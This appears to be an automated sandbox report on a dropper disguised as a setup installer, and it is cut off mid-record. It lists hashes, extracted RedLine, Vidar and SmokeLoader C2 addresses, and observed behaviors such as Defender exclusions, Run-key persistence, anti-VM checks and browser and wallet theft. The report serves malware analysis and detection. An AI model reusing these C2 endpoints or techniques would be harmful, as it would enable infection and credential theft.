Overview
overview
10Static
static
setup_x86_...0).exe
windows7_x64
setup_x86_...0).exe
windows10_x64
10setup_x86_...1).exe
windows7_x64
setup_x86_...1).exe
windows10_x64
setup_x86_...2).exe
windows7_x64
setup_x86_...2).exe
windows10_x64
10setup_x86_...3).exe
windows7_x64
setup_x86_...3).exe
windows10_x64
setup_x86_...4).exe
windows7_x64
setup_x86_...4).exe
windows10_x64
setup_x86_...5).exe
windows7_x64
setup_x86_...5).exe
windows10_x64
10setup_x86_...6).exe
windows7_x64
setup_x86_...6).exe
windows10_x64
10setup_x86_...7).exe
windows7_x64
setup_x86_...7).exe
windows10_x64
setup_x86_...8).exe
windows7_x64
setup_x86_...8).exe
windows10_x64
10setup_x86_...9).exe
windows7_x64
10setup_x86_...9).exe
windows10_x64
setup_x86_...2).exe
windows7_x64
setup_x86_...2).exe
windows10_x64
setup_x86_...0).exe
windows7_x64
10setup_x86_...0).exe
windows10_x64
10setup_x86_...1).exe
windows7_x64
setup_x86_...1).exe
windows10_x64
setup_x86_...2).exe
windows7_x64
setup_x86_...2).exe
windows10_x64
setup_x86_...3).exe
windows7_x64
setup_x86_...3).exe
windows10_x64
10setup_x86_...3).exe
windows7_x64
setup_x86_...3).exe
windows10_x64
10Resubmissions
06-09-2021 14:13
210906-rjpvrsedbm 1008-07-2021 11:08
210708-4gztl3mwl6 1008-07-2021 08:02
210708-klfb4qeda6 1007-07-2021 09:39
210707-nem57xyvf2 1006-07-2021 17:51
210706-7pcrmjy3fa 1006-07-2021 13:45
210706-eybelwcq86 1005-07-2021 04:26
210705-z99jkt6lce 10Analysis
-
max time kernel
1548s -
max time network
1808s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
07-07-2021 09:39
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install - копия (10).exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
setup_x86_x64_install - копия (10).exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install - копия (11).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
setup_x86_x64_install - копия (11).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
setup_x86_x64_install - копия (12).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
setup_x86_x64_install - копия (12).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install - копия (13).exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
setup_x86_x64_install - копия (13).exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
setup_x86_x64_install - копия (14).exe
Resource
win7v20210408
Behavioral task
behavioral10
Sample
setup_x86_x64_install - копия (14).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
setup_x86_x64_install - копия (15).exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
setup_x86_x64_install - копия (15).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
setup_x86_x64_install - копия (16).exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
setup_x86_x64_install - копия (16).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
setup_x86_x64_install - копия (17).exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
setup_x86_x64_install - копия (17).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
setup_x86_x64_install - копия (18).exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
setup_x86_x64_install - копия (18).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
setup_x86_x64_install - копия (19).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
setup_x86_x64_install - копия (19).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
setup_x86_x64_install - копия (2).exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
setup_x86_x64_install - копия (2).exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
setup_x86_x64_install - копия (20).exe
Resource
win7v20210408
Behavioral task
behavioral24
Sample
setup_x86_x64_install - копия (20).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
setup_x86_x64_install - копия (21).exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
setup_x86_x64_install - копия (21).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
setup_x86_x64_install - копия (22).exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
setup_x86_x64_install - копия (22).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
setup_x86_x64_install - копия (23).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
setup_x86_x64_install - копия (23).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
setup_x86_x64_install - копия (3).exe
Resource
win7v20210410
General
-
Target
setup_x86_x64_install - копия (20).exe
-
Size
3.2MB
-
MD5
3ae1c212119919e5fce71247286f8e0e
-
SHA1
97c1890ab73c539056f95eafede319df774e9d38
-
SHA256
30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e
-
SHA512
5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558
Malware Config
Extracted
redline
ServAni
87.251.71.195:82
Extracted
vidar
39.4
706
https://sergeevih43.tumblr.com
-
profile_id
706
Extracted
smokeloader
2020
http://ppcspb.com/upload/
http://mebbing.com/upload/
http://twcamel.com/upload/
http://howdycash.com/upload/
http://lahuertasonora.com/upload/
http://kpotiques.com/upload/
Signatures
-
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXerUNdlL32.eXerUNdlL32.eXerUNdlL32.eXerUNdlL32.eXerUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5768 5672 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6708 5672 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5612 5672 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9140 5672 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4912 5672 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5880 5672 rUNdlL32.eXe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
Processes:
resource yara_rule behavioral24/memory/208-185-0x0000000000417F26-mapping.dmp family_redline behavioral24/memory/208-182-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral24/memory/3144-272-0x000000000A290000-0x000000000A2C8000-memory.dmp family_redline behavioral24/memory/4100-349-0x0000000000417E8E-mapping.dmp family_redline behavioral24/memory/5004-350-0x0000000000417E9A-mapping.dmp family_redline behavioral24/memory/4960-348-0x0000000000418392-mapping.dmp family_redline behavioral24/memory/4636-347-0x0000000000417E4A-mapping.dmp family_redline behavioral24/memory/4224-360-0x0000000000417E8A-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 5804 created 5092 5804 WerFault.exe mqnMtgWvbwILOMZrKc6CsUOn.exe PID 5440 created 5644 5440 WerFault.exe MicrosoftEdgeCP.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
svchost.exedescription pid process target process PID 5824 created 5072 5824 svchost.exe ypYDB0vdoDVBp7hsRzifyKGQ.exe PID 5824 created 6820 5824 svchost.exe 4AEF.exe PID 5824 created 5480 5824 svchost.exe app.exe PID 5824 created 2184 5824 svchost.exe app.exe PID 5824 created 6908 5824 svchost.exe app.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral24/memory/2164-293-0x0000000000400000-0x0000000000949000-memory.dmp family_vidar behavioral24/memory/2164-295-0x00000000026A0000-0x000000000273D000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC2647624\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC2647624\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC2647624\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC2647624\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC2647624\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC2647624\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe aspack_v212_v242 -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.execmd.exeflow pid process 521 7116 powershell.exe 527 7116 powershell.exe 606 1828 cmd.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
Processes:
èeèrgegdè_éçè_)))_.exe12(((((.exeConhost.exe_____________bob.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts èeèrgegdè_éçè_)))_.exe File opened for modification C:\Windows\system32\drivers\etc\hosts 12(((((.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts _____________bob.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exearnatic_3.exearnatic_2.exearnatic_6.exearnatic_1.exearnatic_5.exearnatic_4.exearnatic_7.exe3081054.exearnatic_7.exe1126656.exe1100866.exe5925079.exeWinHoster.exejfiag3g_gg.exexLrZ7sMbOcUYQ6ZyqN_bIeZe.exeqeWffXXPdL7IgtmXJGM3uvPh.execjG0Iam1Jj0cNNTd_SEVIp5b.exe9zaJqMiAhVnJuMyvpBs_Vj8h.exen_XvoC0lA5U4xLfvwMUQ9ivc.exe1YsRDMFL5gbGtNm7s1bVicwX.exeiaK6LGtP0xsu467Y5J6nvafj.exe_eaNdnN9tnNRXIFKGG2yF0fp.exeARSOO0DIp2UugIvuwrSyM9oD.exe7ZI0ROMveurFDV8Aq7DVyS06.exeDHL4Bb1YNR_LuTP87OTPpPEl.exeaq3T5oYFV8GDNuh6ZK8xkEpC.exeypYDB0vdoDVBp7hsRzifyKGQ.exe1ZEZmKpZvb1tt3sffeQxkrs7.exexe3VggU3QswqnlgTx1tHoeRE.exek7J6IwuP2boLb7UjbN8PRSuh.exezlH6t0Do4fta14d4vAtHE7CM.exemqnMtgWvbwILOMZrKc6CsUOn.exeDwWykW183aeAvVfpw5QqTYgL.exexLrZ7sMbOcUYQ6ZyqN_bIeZe.exen_XvoC0lA5U4xLfvwMUQ9ivc.exe1YsRDMFL5gbGtNm7s1bVicwX.exeqeWffXXPdL7IgtmXJGM3uvPh.exeDHL4Bb1YNR_LuTP87OTPpPEl.exeMrGh6bEH0L0a.exechrome.exezlH6t0Do4fta14d4vAtHE7CM.exejooyu.exejingzhang.exemd8_8eus.exeBrowzar.exeMrGh6bEH0L0a.exejfiag3g_gg.exejfiag3g_gg.exe25D.exeypYDB0vdoDVBp7hsRzifyKGQ.exe335C.exe3745.exe3C96.exe4590.exedata_load.exedata_load.exeDFFC.exeE3F5.exewiZC_h7~B.eXE335C.exepid process 1580 setup_installer.exe 3672 setup_install.exe 1128 arnatic_3.exe 1252 arnatic_2.exe 3712 arnatic_6.exe 2164 arnatic_1.exe 1584 arnatic_5.exe 3788 arnatic_4.exe 3804 arnatic_7.exe 3144 3081054.exe 208 arnatic_7.exe 3876 1126656.exe 684 1100866.exe 3144 3081054.exe 4176 5925079.exe 4644 WinHoster.exe 4732 jfiag3g_gg.exe 4304 xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe 4572 qeWffXXPdL7IgtmXJGM3uvPh.exe 1128 cjG0Iam1Jj0cNNTd_SEVIp5b.exe 4652 9zaJqMiAhVnJuMyvpBs_Vj8h.exe 4744 n_XvoC0lA5U4xLfvwMUQ9ivc.exe 2088 1YsRDMFL5gbGtNm7s1bVicwX.exe 4792 iaK6LGtP0xsu467Y5J6nvafj.exe 4928 _eaNdnN9tnNRXIFKGG2yF0fp.exe 2144 ARSOO0DIp2UugIvuwrSyM9oD.exe 4140 7ZI0ROMveurFDV8Aq7DVyS06.exe 2060 DHL4Bb1YNR_LuTP87OTPpPEl.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 5072 ypYDB0vdoDVBp7hsRzifyKGQ.exe 5020 1ZEZmKpZvb1tt3sffeQxkrs7.exe 4192 xe3VggU3QswqnlgTx1tHoeRE.exe 1040 k7J6IwuP2boLb7UjbN8PRSuh.exe 5044 zlH6t0Do4fta14d4vAtHE7CM.exe 5092 mqnMtgWvbwILOMZrKc6CsUOn.exe 5084 DwWykW183aeAvVfpw5QqTYgL.exe 4636 xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe 4960 n_XvoC0lA5U4xLfvwMUQ9ivc.exe 4100 1YsRDMFL5gbGtNm7s1bVicwX.exe 5004 qeWffXXPdL7IgtmXJGM3uvPh.exe 4224 DHL4Bb1YNR_LuTP87OTPpPEl.exe 412 MrGh6bEH0L0a.exe 2192 chrome.exe 4664 zlH6t0Do4fta14d4vAtHE7CM.exe 4872 jooyu.exe 3940 jingzhang.exe 4536 md8_8eus.exe 3876 Browzar.exe 5480 MrGh6bEH0L0a.exe 5508 jfiag3g_gg.exe 5632 jfiag3g_gg.exe 3936 25D.exe 5480 MrGh6bEH0L0a.exe 6824 ypYDB0vdoDVBp7hsRzifyKGQ.exe 2484 335C.exe 5292 3745.exe 6372 3C96.exe 5844 4590.exe 4884 data_load.exe 7080 data_load.exe 6656 DFFC.exe 5428 E3F5.exe 6380 wiZC_h7~B.eXE 6744 335C.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
7ZI0ROMveurFDV8Aq7DVyS06.exeiaK6LGtP0xsu467Y5J6nvafj.execjG0Iam1Jj0cNNTd_SEVIp5b.exeARSOO0DIp2UugIvuwrSyM9oD.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7ZI0ROMveurFDV8Aq7DVyS06.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion iaK6LGtP0xsu467Y5J6nvafj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion iaK6LGtP0xsu467Y5J6nvafj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cjG0Iam1Jj0cNNTd_SEVIp5b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cjG0Iam1Jj0cNNTd_SEVIp5b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ARSOO0DIp2UugIvuwrSyM9oD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ARSOO0DIp2UugIvuwrSyM9oD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7ZI0ROMveurFDV8Aq7DVyS06.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
jingzhang.exeXegysukinae.exeBugyponoku.exeFikumigaena.exeTuvuduloxa.exearnatic_3.exearnatic_6.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation jingzhang.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Xegysukinae.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Bugyponoku.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Fikumigaena.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Tuvuduloxa.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation arnatic_3.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation arnatic_6.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exerUNdlL32.eXearnatic_2.exearnatic_1.exeaq3T5oYFV8GDNuh6ZK8xkEpC.exechrome.exeMrGh6bEH0L0a.exexe3VggU3QswqnlgTx1tHoeRE.exerUNdlL32.eXerundll32.exe25D.exe4590.exe3745.exeDFFC.exerundll32.exerundll32.exelighteningplayer-cache-gen.exepid process 3672 setup_install.exe 3672 setup_install.exe 3672 setup_install.exe 3672 setup_install.exe 3672 setup_install.exe 3172 rUNdlL32.eXe 1252 arnatic_2.exe 2164 arnatic_1.exe 2164 arnatic_1.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 8 chrome.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 5480 MrGh6bEH0L0a.exe 4192 xe3VggU3QswqnlgTx1tHoeRE.exe 4192 xe3VggU3QswqnlgTx1tHoeRE.exe 5788 rUNdlL32.eXe 6044 rundll32.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 3936 25D.exe 3936 25D.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 5844 4590.exe 5292 3745.exe 5292 3745.exe 5292 3745.exe 5292 3745.exe 5292 3745.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 6656 DFFC.exe 6656 DFFC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 5308 rundll32.exe 6988 rundll32.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 4396 aq3T5oYFV8GDNuh6ZK8xkEpC.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe 5500 lighteningplayer-cache-gen.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe themida C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe themida C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe themida C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe themida -
Processes:
rundll32.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QRIvBFx = "0" rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
1100866.exeèeèrgegdè_éçè_)))_.exe_____________bob.exe12(((((.exeConhost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1100866.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xaecylolunae.exe\"" èeèrgegdè_éçè_)))_.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Tesaetonaexa.exe\"" _____________bob.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Pefefariny.exe\"" 12(((((.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Daewixaeruli.exe\"" Conhost.exe -
Checks for any installed AV software in registry 1 TTPs 5 IoCs
Processes:
Conhost.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab Conhost.exe Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
7ZI0ROMveurFDV8Aq7DVyS06.exeiaK6LGtP0xsu467Y5J6nvafj.exeBrowzar.exemd8_8eus.exenote8876.execjG0Iam1Jj0cNNTd_SEVIp5b.exeARSOO0DIp2UugIvuwrSyM9oD.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7ZI0ROMveurFDV8Aq7DVyS06.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iaK6LGtP0xsu467Y5J6nvafj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Browzar.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA note8876.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cjG0Iam1Jj0cNNTd_SEVIp5b.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ARSOO0DIp2UugIvuwrSyM9oD.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 24 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1167 ipinfo.io 56 ipinfo.io 453 ipinfo.io 523 ip-api.com 1103 checkip.dyndns.org 1105 ipinfo.io 1162 ipinfo.io 1165 checkip.dyndns.org 12 ip-api.com 456 ipinfo.io 619 ipinfo.io 626 ipinfo.io 1110 ipinfo.io 624 ipinfo.io 625 ipinfo.io 1114 ipinfo.io 1161 ipinfo.io 1204 ipinfo.io 1212 ipinfo.io 57 ipinfo.io 145 checkip.amazonaws.com 547 checkip.amazonaws.com 1097 ipinfo.io 1098 ipinfo.io -
Drops file in System32 directory 32 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exesvchost.exesvchost.exerundll32.exeConhost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent E2C9EB35A2E84C34 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\Tasks\QRIvBFx svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent DF0B9C39A7969DE8 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\Tasks\Videocard Service svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol Conhost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\GroupPolicy Conhost.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Conhost.exe File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini Conhost.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 50E0C83ED140FE88 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
cjG0Iam1Jj0cNNTd_SEVIp5b.exeARSOO0DIp2UugIvuwrSyM9oD.exe7ZI0ROMveurFDV8Aq7DVyS06.exeiaK6LGtP0xsu467Y5J6nvafj.exepid process 1128 cjG0Iam1Jj0cNNTd_SEVIp5b.exe 2144 ARSOO0DIp2UugIvuwrSyM9oD.exe 4140 7ZI0ROMveurFDV8Aq7DVyS06.exe 4792 iaK6LGtP0xsu467Y5J6nvafj.exe -
Suspicious use of SetThreadContext 17 IoCs
Processes:
arnatic_7.exesvchost.exexLrZ7sMbOcUYQ6ZyqN_bIeZe.exen_XvoC0lA5U4xLfvwMUQ9ivc.exe1YsRDMFL5gbGtNm7s1bVicwX.exeqeWffXXPdL7IgtmXJGM3uvPh.exeDHL4Bb1YNR_LuTP87OTPpPEl.exe_eaNdnN9tnNRXIFKGG2yF0fp.exeMrGh6bEH0L0a.execmd.execompattelrunner.exejdrbfsftoolspab1.exetoolspab1.exejfiag3g_gg.exesvchost.exewirbfsfdescription pid process target process PID 3804 set thread context of 208 3804 arnatic_7.exe arnatic_7.exe PID 3900 set thread context of 3872 3900 svchost.exe svchost.exe PID 4304 set thread context of 4636 4304 xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe PID 4744 set thread context of 4960 4744 n_XvoC0lA5U4xLfvwMUQ9ivc.exe n_XvoC0lA5U4xLfvwMUQ9ivc.exe PID 2088 set thread context of 4100 2088 1YsRDMFL5gbGtNm7s1bVicwX.exe 1YsRDMFL5gbGtNm7s1bVicwX.exe PID 4572 set thread context of 5004 4572 qeWffXXPdL7IgtmXJGM3uvPh.exe qeWffXXPdL7IgtmXJGM3uvPh.exe PID 2060 set thread context of 4224 2060 DHL4Bb1YNR_LuTP87OTPpPEl.exe 